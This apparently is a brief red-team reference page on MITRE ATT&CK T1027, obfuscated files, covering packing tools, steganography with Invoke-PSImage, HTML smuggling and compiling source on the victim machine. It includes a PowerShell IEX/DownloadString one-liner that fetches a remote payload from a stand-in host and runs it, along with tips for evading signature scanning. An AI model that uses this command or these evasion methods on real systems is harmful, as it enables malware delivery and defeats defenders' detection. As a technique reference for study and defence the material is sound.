Obfuscated Files or Information

Obfuscated Files or Information (T1027)

Making the malicious look benign (or unreadable).

1. Software Packing

Compressing and encrypting the executable.

  • Tools: UPX (Common, easily flagged), ConfuserEx (.NET), Themida (Commercial).
  • Behavior: The binary unpacks itself into memory at runtime.

2. Steganography

Hiding code in images.

  • Example: Invoke-PSImage. Embeds a PowerShell script into the pixels of a BMP file.
  • Command: IEX(New-Object Net.WebClient).DownloadString('site.com/image.png') extracts and runs the pixels.

3. HTML Smuggling

(Detailed in Initial Access).

  • Hiding the malware payload inside a base64 string in an HTML file. The browser decodes it and "downloads" it to the user's disk locally.

4. Compile After Delivery

Don't send a binary. Send the source code (.cs or .py).

  • Benefit: Signatures scan binaries, not source text.
  • Execution: Use csc.exe (C# Compiler, built-in to Windows) to compile it on the victim machine.